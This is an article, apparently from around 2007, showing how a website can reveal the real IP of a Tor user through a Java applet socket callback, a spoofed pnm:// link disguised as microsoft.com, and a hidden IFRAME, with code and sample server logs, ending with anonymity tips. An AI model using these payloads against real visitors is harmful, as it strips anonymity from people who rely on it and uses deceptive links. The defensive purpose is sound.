For the purposes of this article in order to follow along, you will need two computers on seperate internet connections. Do not use the same LAN since all you'll see are internal IPs and you don't really get a good sense of how all this works unless you see the IP connections. The first computer will serve as your nemesis. Your nemesis, oh let's say the FBI, knows you use Tor to do certain research projects on certain government agencies. They want to lure you to a special website that may expose your IP. They have set up a Linux workstation that is running Apache. The second computer is yours and for argument sake, let it be a Windows XP machine. Java is installed and working properly. If you're following along, you're playing both roles as FBI and miscreant. Let's define some variables for this example (they're all not real by the way):
Your real IP: 32.44.66.88
A Tor Server IP: 99.88.44.11 (this is the contacting Tor server in a chain of servers that contacts the "FBI" server that will serve up the webpage.)
The "FBI" server IP: 200.100.35.25
If you are doing this at home and your "FBI" website is connected to broadband, you may have to use a port other than 80. Some broadband companies forbid inbound traffic on certain ports to their customers' computers for obvious reasons. However, they don't necessarily block the upper ports. Also, your "FBI" website must not have inbound traffic NATed, otherwise you won't see the real IP of your second machine making the calls, just internal ones. Your second machine could be dialed into another internet account, such as an AOL account or a VPN account.
Anyway, in your "Agent Fairbanks" role, you will have created a simple html file (I'll call it gotcha.html for this example) with code similar to this:
<html><body><h1>Test</h1>
<applet code="test.class" width=1 height=1></applet>
</body></html>
The code for the java applet is very simple:
import java.applet.*;
import java.awt.*;
import java.net.*;
import java.util.*;
import java.lang.*;
import java.io.*;
public class test extends Applet {
public void init() {}
public void start(){
try {
InetAddress addr = InetAddress.getByName("200.100.35.25");
int port = 80;
Socket sock = new Socket(addr, port);
BufferedReader rd = new BufferedReader(new InputStreamReader(sock.getInputStream()));
BufferedWriter wr = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream()));
wr.write("GET /nonexistentpage.html");
wr.flush();
wr.write("\n\n\n");
wr.flush();
String str;
while ((str = rd.readLine()) != null) {
System.out.println(""+str);
}
rd.close();
} catch (Exception e) {
System.out.println(""+e);
}
}
public void stop(){}
public void destroyed(){}
public void paint(Graphics g){}
}//end applet class
In this article I assume "Agent Fairbanks" knows how to compile an applet. Anyway, in your miscreant role, you would have installed the Windows version of Tor and Privoxy which can be found on the Tor website. Just follow the directions on how to set up both of them. As you visit the "FBI" server and browse the gotcha.html, the applet makes a call back to the "FBI" server asking for a page which doesn't exist on that server. But wait, you say! I thought an applet couldn't use the network classes in the default security settings of the sandbox? That's not exactly true. An applet can communicate back to the server from where it came, in this case, the "FBI" server to which you were lured. And when it does, it bypasses the Tor system and communicates out through your connection to your ISP, thereby exposing your real IP to "Agent Fairbanks'" server. This is an example of what "Agent Fairbanks" might see in his logs as your IE browser visited the gotcha.html page (IPs, dates, and times have been changed to protect the real miscreant):
99.88.44.11 - - [12/Jan/2007:17:31:40 -0100] "GET /gotcha.html HTTP/1.0" 200 96 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 99.88.44.11 - - [12/Jan/2007:17:31:42 -0100] "GET /test.class HTTP/1.1" 304 0 "-" "Mozilla/4.0 (Windows XP 5.1) Java/1.4.2_08" 32.44.66.88 - - [12/Jan/2007:17:31:43 -0100] "GET /nonexistentpage.html" 404 1047 "-" "-"
If "Agent Fairbanks" is smart, he would be cat'in the Apache access_log file and grepping for that unusually-named nonexistent webpage that the applet tried to retrieve. At this point, you're probably thinking, "I'll just disable Java or use a browser that doesn't support Java. I'll be safe." As in the words of Han Solo in the original 1977 Star Wars movie, "Don't get cocky, kid."
99.88.44.11 - - [12/Jan/2007:17:45:31 -0100] "GET /nonexistentfile.ra HTTP/1.0" 40
4 1051 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
32.44.66.88 - - [12/Jan/2007:17:45:46 -0100] "PNA" 501 988 "-" "-"
The first line of "Agent Fairbanks'" log entry is the browser making the call through the Tor system. The next line is the Real Networks player making the call out through your ISP connection, exposing your IP to his server. I haven't tested what happens if you don't have the Real Player installed. Does Window's Media Player exhibit the same behavior? Perhaps someone out there could research that.
Anyway, you might be thinking, why would I ever click on a link like that, knowing what I know now? Well, the answer is you might not even know you're exposing your IP until it's too late. There is an issue with the way Microsoft IE handles links and this was discovered by a security researcher who published his findings. Unfortunately, I don't remember his name so I apologize to him. However, I recall reading somewhere that Microsoft doesn't think this is a vulnerability, although, I would assume 100,000 cheering phishers would think otherwise. Here is the snippet of code:
<html><body> <A href="http://www.microsoft.com"> <FORM action=pnm://200.100.35.25:80/nonexistentfile.ra method=get> <INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" type=submit value=http://www.microsoft.com> </A> </body></html>When I test this code after having all of the latest patches installed on my XP box, this trick still works. What happens if you view this page in your browser is that you will see that link pointing to www.microsoft.com. When you move your mouse cursor over the link the status bar at the bottom of the browser also shows www.microsoft.com. But when you actually click on the link, you don't go to Microsoft's website, rather the server of "Agent Fairbanks."
But, hey, "Agent Fairbanks" doesn't even need to get you to click on a link. All he needs is a page that uses the IFRAME tag:
<html><body><h1>Frame Test</h1> <IFRAME src="pnm://200.100.35.25:80/nonexistentfile.ra" width=1 height=1 scrolling="no" frameborder=0> </body></html>So, you're sick of Microsoft and IE and a java-enabled browser and decide to use Mozilla on Linux. You're safe, right? Not necessarily. Mozilla by default doesn't have Java set up, but it can be. But let's say you don't want Java. Okay, what about the pnm hack, does that work in Mozilla? By default, no, it doesn't because Mozilla doesn't support that protocol. But, remember back when I said that Microsoft IE automatically sets the other protocols to the same proxy when you set the http protocol? Well, guess what. Mozilla does not do that. And if you forget to set the other protocols, all "Agent Fairbanks" has to do is change the src for the IFRAME code above to point to https://200.100.35.25:80/nonexistentfile.html and he will see something similar to this in his access_log file (values have been deliberately changed):
99.88.44.11 - - [12/Jan/2007:17:24:28 -0100] "GET /iframetest.html HTTP/1.0" 200 150 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
32.44.66.88 - - [12/Jan/2007:17:24:31 -0100] "\x90L\x04\x06" 501 988 "-" "-"
The funky characters after the date/timestamp is your browser's SSL connection trying to connect to a non-https port. And although this causes a 501 error, it would still allow "Agent Fairbanks" to grep those lines and compare it to the calls for the iframetest.html page. Of course, if you're that paranoid, you could always use wget to first grab a suspicious page then 'vi' it (don't open it in your browser) to look at the code. All you have to do is set up wget to use the Tor system by creating a ".wgetrc" file in the home directory of whatever user you're logged in as and adding this one line: HTTP_PROXY=127.0.0.1:8118. Wget is merely going to grab the http source code and won't execute any applets or iframes.
To recap, if you want to keep better anonimity using the Tor system, you should do these things:
1. Don't use a Java-enabled browser or disable Java while using Tor.
2. Set ALL proxy protocols to the same thing, even if you're not going to use them.
3. Be very paranoid of website links that may have been emailed to you, especially if you're using Windows.